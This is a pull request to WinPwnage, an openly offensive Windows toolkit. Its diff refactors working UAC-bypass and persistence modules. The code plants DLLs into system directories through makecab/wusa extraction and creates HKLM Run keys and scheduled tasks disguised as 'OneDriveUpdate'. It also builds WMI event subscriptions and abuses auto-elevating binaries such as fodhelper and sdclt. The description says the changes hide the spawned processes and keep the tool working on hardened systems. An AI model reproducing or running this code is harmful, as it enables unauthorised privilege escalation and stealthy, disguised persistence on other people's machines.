### PR TITLE
Some improvements

### DIFF
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,3 +1,1 @@
-wmi
 colorama
-pypiwin32

--- a/winpwnage/core/utils.py
+++ b/winpwnage/core/utils.py
@@ -1,5 +1,4 @@
 import os
-import wmi
 import ctypes
 import platform
 import _winreg

--- a/winpwnage/core/winstructures.py
+++ b/winpwnage/core/winstructures.py
@@ -1,0 +1,88 @@
+from ctypes import (
+	WinDLL, WinError, GetLastError, Structure, POINTER, 
+	c_wchar_p, c_uint32, c_void_p, c_ulong, c_int, 
+	sizeof, byref, create_unicode_buffer, 
+)
+
+from ctypes.wintypes import (
+	BOOL, LPSTR, BYTE, HWND, HANDLE, HKEY, HINSTANCE
+)
+
+# Constants 
+LPWSTR 	= c_wchar_p
+LPVOID 	= c_void_p	
+DWORD 	= c_uint32
+LPDWORD = POINTER(DWORD)
+SW_HIDE = 0
+SW_SHOW = 5
+MAX_PATH 	= 260
+SEE_MASK_NOCLOSEPROCESS = 0x00000040
+PROCESS_QUERY_INFORMATION = 0x0400
+PROCESS_VM_READ = 0x0010
+
+
+class ShellExecuteInfoW(Structure):
+	_fields_ = [
+		('cbSize',          DWORD),
+		('fMask',           c_ulong),
+		('hwnd',            HWND),
+		('lpVerb',          LPWSTR),
+		('lpFile',          LPWSTR),
+		('lpParameters',    LPWSTR),
+		('lpDirectory',     LPWSTR),
+		('nShow',           c_int),
+		('hInstApp',        HINSTANCE),
+		('lpIDList',        LPVOID),
+		('lpClass',         LPWSTR),
+		('hKeyClass',       HKEY),
+		('dwHotKey',        DWORD),
+		('hIcon',           HANDLE),
+		('hProcess',        HANDLE)
+	]
+PShellExecuteInfoW = POINTER(ShellExecuteInfoW)
+
+# Load dlls
+shell32 	= WinDLL('shell32', use_last_error=True)
+kernel32 	= WinDLL('kernel32', use_last_error=True)
+psapi 		= WinDLL('psapi', use_last_error=True)
+
+# Functions
+ShellExecuteEx 			= shell32.ShellExecuteExW
+ShellExecuteEx.argtypes = [PShellExecuteInfoW]
+ShellExecuteEx.restype 	= BOOL
+
+OpenProcess 			= kernel32.OpenProcess
+OpenProcess.restype 	= HANDLE
+OpenProcess.argtypes 	= [DWORD, BOOL, DWORD]
+
+CloseHandle 			= kernel32.CloseHandle
+CloseHandle.argtypes 	= [LPVOID]
+CloseHandle.restype 	= c_int
+
+EnumProcesses 			= psapi.EnumProcesses
+EnumProcesses.argtypes 	= [LPVOID, DWORD, LPDWORD]
+EnumProcesses.restype 	= BOOL
+
+QueryFullProcessImageNameW 			= kernel32.QueryFullProcessImageNameW
+QueryFullProcessImageNameW.argtypes = [HANDLE, DWORD, LPWSTR, POINTER(DWORD)]
+QueryFullProcessImageNameW.restype  = BOOL
+
+
+def get_process_name(hProcess, dwFlags = 0):
+	ERROR_INSUFFICIENT_BUFFER = 122
+	dwSize = MAX_PATH
+	while 1:
+		lpdwSize = DWORD(dwSize)
+		lpExeName = create_unicode_buffer('', lpdwSize.value + 1)
+		success = QueryFullProcessImageNameW(hProcess, dwFlags, lpExeName, byref(lpdwSize))
+		if success and 0 < lpdwSize.value < dwSize:
+			break
+		error = GetLastError()
+		if error != ERROR_INSUFFICIENT_BUFFER:
+			return False
+		dwSize = dwSize + 256
+		if dwSize > 0x1000:
+			# this prevents an infinite loop in Windows 2008 when the path has spaces,
+			# see http://msdn.microsoft.com/en-us/library/ms684919(VS.85).aspx#4
+			return False
+	return lpExeName.value

--- a/winpwnage/functions/persist/persist_dll_explorer.py
+++ b/winpwnage/functions/persist/persist_dll_explorer.py
@@ -37,7 +37,7 @@ def fax_dll(payload):
 		if os.path.isfile(os.path.join(tempfile.gettempdir(), "fxsst.dll")) == True:
 			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "fxsst.dll"),
-					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0) == True:
+					os.path.join(tempfile.gettempdir(), "suspicious.cab"))) == True:
 				print_success("Successfully created cabinet file")
 			else:
 				print_success("Unable to create cabinet file")
@@ -51,7 +51,7 @@ def fax_dll(payload):
 		if (os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True):
 			if process().create("wusa.exe", params="{} /extract:{} /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
-					information().windows_directory()),0) == True:
+					information().windows_directory())) == True:
 				print_success("Successfully extracted cabinet file")
 			else:
 				print_error("Unable to extract cabinet file")	

--- a/winpwnage/functions/persist/persist_dll_explorer.py
+++ b/winpwnage/functions/persist/persist_dll_explorer.py
@@ -35,7 +35,7 @@ def fax_dll(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(), "fxsst.dll")) == True:
-			if process().create("cmd.exe /c makecab {} {}".format(
+			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "fxsst.dll"),
 					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0) == True:
 				print_success("Successfully created cabinet file")
@@ -49,7 +49,7 @@ def fax_dll(payload):
 		time.sleep(5)
 
 		if (os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True):
-			if process().create("cmd.exe /c wusa {} /extract:{} /quiet".format(
+			if process().create("wusa.exe", params="{} /extract:{} /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
 					information().windows_directory()),0) == True:
 				print_success("Successfully extracted cabinet file")

--- a/winpwnage/functions/persist/persist_hklm_run.py
+++ b/winpwnage/functions/persist/persist_hklm_run.py
@@ -30,7 +30,7 @@ def hklm_run(payload):
 	if payloads().exe(payload):
 		if information().admin():
 			if "64" in information().architecture():
-				if reg_create("Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate", payload):
+				if reg_create("Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", "OneDriveUpdate", payload):
 					print_success("Successfully created OneDriveUpdate key containing payload ({})".format(os.path.join(payload)))
 					print_success("Successfully installed persistence, payload will run at login")
 				else:

--- a/winpwnage/functions/persist/persist_mofcomp.py
+++ b/winpwnage/functions/persist/persist_mofcomp.py
@@ -65,7 +65,7 @@ instance of __FilterToConsumerBinding
 				print_info("Disabling file system redirection")
 				with disable_fsr():
 					print_success("Successfully disabled file system redirection")
-					if process().create("mofcomp.exe", params="{}".format(os.path.join(tempfile.gettempdir(), "persist.mof")), 0):
+					if process().create("mofcomp.exe", params="{}".format(os.path.join(tempfile.gettempdir(), "persist.mof"))):
 						print_success("Successfully compiled mof file containing our payload ({})".format(payload))
 						print_success("Successfully installed persistence, payload will after boot")
 					else:

--- a/winpwnage/functions/persist/persist_mofcomp.py
+++ b/winpwnage/functions/persist/persist_mofcomp.py
@@ -65,7 +65,7 @@ instance of __FilterToConsumerBinding
 				print_info("Disabling file system redirection")
 				with disable_fsr():
 					print_success("Successfully disabled file system redirection")
-					if process().create("mofcomp.exe {}".format(os.path.join(tempfile.gettempdir(), "persist.mof")), 0):
+					if process().create("mofcomp.exe", params="{}".format(os.path.join(tempfile.gettempdir(), "persist.mof")), 0):
 						print_success("Successfully compiled mof file containing our payload ({})".format(payload))
 						print_success("Successfully installed persistence, payload will after boot")
 					else:

--- a/winpwnage/functions/persist/persist_schtask.py
+++ b/winpwnage/functions/persist/persist_schtask.py
@@ -77,8 +77,8 @@ def schtask(payload):
 			time.sleep(5)
 		
 			if os.path.isfile(os.path.join(tempfile.gettempdir(),"elevator.xml")) == True:
-				if process().create("schtasks /create /xml {} /tn OneDriveUpdate".format(
-						os.path.join(tempfile.gettempdir(), "elevator.xml")), 0):
+				if process().create("schtasks.exe", params="/create /xml {} /tn OneDriveUpdate".format(
+						os.path.join(tempfile.gettempdir(), "elevator.xml"))):
 					print_success("Successfully created scheduled task, payload will run at login")
 				else:
 					print_error("Unable to create scheduled task")	

--- a/winpwnage/functions/persist/persist_wmic.py
+++ b/winpwnage/functions/persist/persist_wmic.py
@@ -22,7 +22,7 @@ wmic_info = {
 def persist_wmic(payload):
 	if payloads().exe(payload):
 		if information().admin():
-			if process().create("wmic /namespace:'\\\\root\\subscription' PATH __EventFilter CREATE Name='WinPwnageFilter', EventNameSpace='root\\cimv2',QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''", 0):
+			if process().create("wmic.exe", params="/namespace:'\\\\root\\subscription' PATH __EventFilter CREATE Name='WinPwnageFilter', EventNameSpace='root\\cimv2',QueryLanguage='WQL', Query='SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System''"):
 				print_success("Successfully created __EventFilter")
 			else:
 				print_error("Unable to create event filter")
@@ -30,7 +30,7 @@ def persist_wmic(payload):
 
 			time.sleep(3)
 
-			if process().create("wmic /namespace:'\\\\root\\subscription' PATH CommandLineEventConsumer CREATE Name='WinPwnageConsumer', ExecutablePath='{}',CommandLineTemplate='{}'".format(os.path.join(payload),os.path.join(payload)), 0):
+			if process().create("wmic.exe", params="/namespace:'\\\\root\\subscription' PATH CommandLineEventConsumer CREATE Name='WinPwnageConsumer', ExecutablePath='{}',CommandLineTemplate='{}'".format(os.path.join(payload),os.path.join(payload))):
 				print_success("Successfully created CommandLineEventConsumer")
 			else:
 				print_error("Unable to create CommandLineEventConsumer")
@@ -38,7 +38,7 @@ def persist_wmic(payload):
 
 			time.sleep(3)
 
-			if process().create("wmic /namespace:'\\\\root\\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='WinPwnageFilter'', Consumer='CommandLineEventConsumer.Name='WinPwnageConsumer''", 0):
+			if process().create("wmic.exe", params="/namespace:'\\\\root\\subscription' PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name='WinPwnageFilter'', Consumer='CommandLineEventConsumer.Name='WinPwnageConsumer''"):
 				print_success("Successfully created __FilterToConsumerBinding")
 			else:
 				print_error("Unable to create __FilterToConsumerBinding")

--- a/winpwnage/functions/uac/uac_compmgmtlauncher.py
+++ b/winpwnage/functions/uac/uac_compmgmtlauncher.py
@@ -33,7 +33,7 @@ def compmgmtlauncher(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c start CompMgmtLauncher.exe", 1):
+			if process().create("CompMgmtLauncher.exe"):
 				print_success("Successfully spawned process ({})".format(os.path.join(payload)))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_computerdefaults.py
+++ b/winpwnage/functions/uac/uac_computerdefaults.py
@@ -36,7 +36,7 @@ def computerdefaults(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c start computerdefaults.exe", 1):
+			if process().create("computerdefaults.exe"):
 				print_success("Successfully spawned process ({})".format(os.path.join(payload)))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_dll_cliconfg.py
+++ b/winpwnage/functions/uac/uac_dll_cliconfg.py
@@ -33,9 +33,9 @@ def cliconfg(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"NTWDBLIB.dll")) == True:
-			if process().create("cmd.exe /c makecab {} {}".format(
+			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "NTWDBLIB.dll"),
-					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0):
+					os.path.join(tempfile.gettempdir(), "suspicious.cab"))):
 				print_success("Successfully created cabinet file")
 			else:
 				print_success("Unable to create cabinet file")
@@ -47,9 +47,9 @@ def cliconfg(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"suspicious.cab")) == True:
-			if process().create("cmd.exe /c wusa {} /extract:{} /quiet".format(
+			if process().create("wusa.exe", params="{} /extract:{} /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
-					information().system_directory()), 0):
+					information().system_directory())):
 				print_success("Successfully extracted cabinet file")
 			else:
 				print_error("Unable to extract cabinet file")	
@@ -63,7 +63,7 @@ def cliconfg(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c {}\cliconfg.exe".format(information().system_directory()), 0):
+			if process().create(os.path.join(information().system_directory(), "cliconfg.exe")):
 				print_success("Successfully executed cliconfg executable")
 				if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
 					try:

--- a/winpwnage/functions/uac/uac_dll_mcx2prov.py
+++ b/winpwnage/functions/uac/uac_dll_mcx2prov.py
@@ -33,9 +33,9 @@ def mcx2prov(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll")) == True:
-			if process().create("cmd.exe /c makecab {} {}".format(
+			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll"),
-					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0):
+					os.path.join(tempfile.gettempdir(), "suspicious.cab"))):
 				print_success("Successfully created cabinet file")
 			else:
 				print_success("Unable to create cabinet file")
@@ -47,9 +47,9 @@ def mcx2prov(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
-			if process().create("cmd.exe /c wusa {} /extract:{}\ehome /quiet".format(
+			if process().create("wusa.exe", params="{} /extract:{}\\ehome /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
-					information().windows_directory()), 0):
+					information().windows_directory())):
 				print_success("Successfully extracted cabinet file")
 			else:
 				print_error("Unable to extract cabinet file")
@@ -63,24 +63,28 @@ def mcx2prov(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c {}\ehome\mcx2prov.exe".format(information().windows_directory()), 0):
-				print_success("Successfully executed mcx2prov executable")
-				if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
-					try:
-						os.remove(os.path.join(tempfile.gettempdir(), "suspicious.cab"))
-					except Exception as error:
-						return False
+			if os.path.exists(os.path.join(information().windows_directory(), 'ehome', 'mcx2prov.exe')):
+				if process().create(os.path.join(information().windows_directory(), 'ehome', 'mcx2prov.exe')):
+					print_success("Successfully executed mcx2prov executable")
+					if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
+						try:
+							os.remove(os.path.join(tempfile.gettempdir(), "suspicious.cab"))
+						except Exception as error:
+							return False
+					else:
+						pass
+					if os.path.isfile(os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll")) == True:
+						try:
+							os.remove(os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll"))
+						except Exception as error:
+							return False
+					else:
+						pass
 				else:
-					pass
-				if os.path.isfile(os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll")) == True:
-					try:
-						os.remove(os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll"))
-					except Exception as error:
-						return False
-				else:
-					pass
+					print_error("Unable to execute mcx2prov executable")
+					return False
 			else:
-				print_error("Unable to execute mcx2prov executable")
+				print_error("Cannot found mcx2prov")
 				return False
 	else:
 		print_error("Cannot proceed, invalid payload")

--- a/winpwnage/functions/uac/uac_dll_mcx2prov.py
+++ b/winpwnage/functions/uac/uac_dll_mcx2prov.py
@@ -84,7 +84,7 @@ def mcx2prov(payload):
 					print_error("Unable to execute mcx2prov executable")
 					return False
 			else:
-				print_error("Cannot found mcx2prov")
+				print_error("Cannot find mcx2prov")
 				return False
 	else:
 		print_error("Cannot proceed, invalid payload")

--- a/winpwnage/functions/uac/uac_dll_migwiz.py
+++ b/winpwnage/functions/uac/uac_dll_migwiz.py
@@ -33,9 +33,9 @@ def migwiz(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"CRYPTBASE.dll")) == True:
-			if process().create("cmd.exe /c makecab {} {}".format(
+			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll"),
-					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0):
+					os.path.join(tempfile.gettempdir(), "suspicious.cab"))):
 				print_success("Successfully created cabinet file")
 			else:
 				print_success("Unable to create cabinet file")
@@ -47,9 +47,9 @@ def migwiz(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"suspicious.cab")) == True:
-			if process().create("cmd.exe /c wusa {} /extract:{}\migwiz /quiet".format(
+			if process().create("wusa.exe", params="{} /extract:{}\\migwiz /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
-					information().system_directory()), 0):
+					information().system_directory())):
 				print_success("Successfully extracted cabinet file")
 			else:
 				print_error("Unable to extract cabinet file")
@@ -63,7 +63,7 @@ def migwiz(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c {}\migwiz\migwiz.exe".format(information().system_directory()), 0):
+			if process().create(os.path.join(information().system_directory(), 'migwiz', 'migwiz.exe')):
 				print_success("Successfully executed migwiz executable")
 				if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
 					try:

--- a/winpwnage/functions/uac/uac_dll_sysprep.py
+++ b/winpwnage/functions/uac/uac_dll_sysprep.py
@@ -33,9 +33,9 @@ def sysprep(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"CRYPTBASE.dll")) == True:
-			if process().create("cmd.exe /c makecab {} {}".format(
+			if process().create("makecab.exe", params="{} {}".format(
 					os.path.join(tempfile.gettempdir(), "CRYPTBASE.dll"),
-					os.path.join(tempfile.gettempdir(), "suspicious.cab")), 0):
+					os.path.join(tempfile.gettempdir(), "suspicious.cab"))):
 				print_success("Successfully created cabinet file")
 			else:
 				print_success("Unable to create cabinet file")
@@ -47,9 +47,9 @@ def sysprep(payload):
 		time.sleep(5)
 
 		if os.path.isfile(os.path.join(tempfile.gettempdir(),"suspicious.cab")) == True:
-			if process().create("cmd.exe /c wusa {} /extract:{}\sysprep /quiet".format(
+			if process().create("wusa.exe", params="{} /extract:{}\sysprep /quiet".format(
 					os.path.join(tempfile.gettempdir(), "suspicious.cab"),
-					information().system_directory()), 0):
+					information().system_directory())):
 				print_success("Successfully extracted cabinet file")
 			else:
 				print_error("Unable to extract cabinet file")
@@ -63,7 +63,7 @@ def sysprep(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c {}\sysprep\sysprep.exe".format(information().system_directory()), 0):
+			if process().create(os.path.join(information().system_directory(), 'sysprep', 'sysprep.exe')):
 				print_success("Successfully executed sysprep executable")
 				if os.path.isfile(os.path.join(tempfile.gettempdir(), "suspicious.cab")) == True:
 					try:

--- a/winpwnage/functions/uac/uac_eventviewer.py
+++ b/winpwnage/functions/uac/uac_eventviewer.py
@@ -34,7 +34,7 @@ def eventvwr(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c start eventvwr.exe", 1):
+			if process().create("eventvwr.exe"):
 				print_success("Successfully spawned process ({})".format(os.path.join(payload)))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_fodhelper.py
+++ b/winpwnage/functions/uac/uac_fodhelper.py
@@ -36,7 +36,7 @@ def fodhelper(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c start fodhelper.exe", 1):
+			if process().create("fodhelper.exe"):
 				print_success("Successfully spawned process ({})".format(os.path.join(payload)))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_perfmon.py
+++ b/winpwnage/functions/uac/uac_perfmon.py
@@ -75,7 +75,7 @@ def perfmon(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if os.system("perfmon.exe") == 0:
+			if process().create("perfmon.exe"):
 				print_success("Successfully spawned process ({})".format(payload))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_runas.py
+++ b/winpwnage/functions/uac/uac_runas.py
@@ -7,7 +7,7 @@ runas_info = {
 	"Method": "Registry key manipulation",
 	"Id": "01",
 	"Type": "UAC bypass",
-	"Fixed In": "99999",
+	"Fixed In": "99999" if information().uac_level() == 1 else "0",
 	"Works From": "7600",
 	"Admin": False,
 	"Function Name": "runas",
@@ -35,22 +35,25 @@ def manifests(payload):
 
 def runas(payload):
 	if payloads().exe(payload):
+		if os.path.isfile(payload) and payload.endswith(".exe"):
+			params = ''
+		else:
+			# Manage payloads with args 
+			params = payload.replace(payload.split(' ', 1)[0], '').lstrip()
+			payload = payload.split(' ', 1)[0]
+
 		if os.path.isfile(os.path.join(payload)) == True:
 			if manifests(os.path.join(payload)):
-				process().runas(os.path.join(payload))
+				process().runas(payload=payload, params=params)
 			else:
 				if information().admin():
 					print_error("Cannot proceed, we are already elevated")
 					return False
 				else:
-					if information().uac_level() == 1:
-						if process().runas(os.path.join(payload)):
-							print_success("Successfully elevated process ({})".format(os.path.join(payload)))
-						else:
-							print_error("Unable to elevate process ({})".format(os.path.join(payload)))
+					if process().runas(payload=payload, params=params):
+						print_success("Successfully elevated process ({})".format(os.path.join(payload)))
 					else:
-						print_error("Unable to execute payload ({}) UAC level is to high".format(os.path.join(payload)))
-						return False
+						print_error("Unable to elevate process ({})".format(os.path.join(payload)))
 		else:
 			print_error("Unable to execute payload ({}) cannot find payload on disk".format(os.path.join(payload)))
 			return False

--- a/winpwnage/functions/uac/uac_sdcltcontrol.py
+++ b/winpwnage/functions/uac/uac_sdcltcontrol.py
@@ -34,7 +34,7 @@ def sdclt_control(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c start sdclt.exe", 1):
+			if process().create("sdclt.exe"):
 				print_success("Successfully spawned process ({})".format(payload))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_sdcltisolatedcommand.py
+++ b/winpwnage/functions/uac/uac_sdcltisolatedcommand.py
@@ -12,7 +12,7 @@ sdcltisolatedcommand_info = {
 	"Works From": "10240",
 	"Admin": False,
 	"Function Name": "sdclt_isolatedcommand",
-	"Function Payload": True,
+	"Function Payload" : True,
 }
 
 
@@ -34,7 +34,7 @@ def sdclt_isolatedcommand(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("cmd.exe /c sdclt.exe /kickoffelev", 1):
+			if process().create("sdclt.exe", params="/kickoffelev"):
 				print_success("Successfully spawned process ({})".format(payload))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))

--- a/winpwnage/functions/uac/uac_silentcleanup.py
+++ b/winpwnage/functions/uac/uac_silentcleanup.py
@@ -33,7 +33,7 @@ def silentcleanup(payload):
 		print_info("Disabling file system redirection")
 		with disable_fsr():
 			print_success("Successfully disabled file system redirection")
-			if process().create("schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I", 1):
+			if process().create("schtasks.exe", params="/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"):
 				print_success("Successfully spawned process ({})".format(os.path.join(payload)))
 			else:
 				print_error("Unable to spawn process ({})".format(os.path.join(payload)))


### PR DESCRIPTION
Here is what I have changed: 

- WMI dependency has been removed (only native ctypes called are used to create and terminate processes)
- Runas method manages parameters now, and the check for the uac level has been done earlier now. So the scan function will not always say that  this method is possible.
- cmd.exe is not needed anymore (you don't need to call using `cmd /c`). On some hardened windows, you could not launch cmd. 
- All create processes are hidden to avoid seeing a pop up. It was not always the case. 

I have tested lots of modules on win8.1 and  they all work, except this [one](https://github.com/AlessandroZ/WinPwnage/blob/master/winpwnage/functions/uac/uac_dll_mcx2prov.py), because the file is not present on my system, so I have added a [check](https://github.com/AlessandroZ/WinPwnage/blob/master/winpwnage/functions/uac/uac_dll_mcx2prov.py#L66) to not fail. 

Moreover, I suggest you to [winpwnage.py](https://github.com/rootm0s/WinPwnage/blob/master/winpwnage.py) to separate uac and persistence methods. So the user will realize a scan only for uac or for persistence. The main goal is to not use a list of continuous ID, the last ID from bypassuac is 14 and the first ID from persistence is 15. So if you want to add a new bypass uac method, you should change every IDs. I suggest you to start persistence IDs from 1. 

So you could call your tool like that: 
`./winpnwage -scan uac ` or `./winpnwage -scan persistence`  


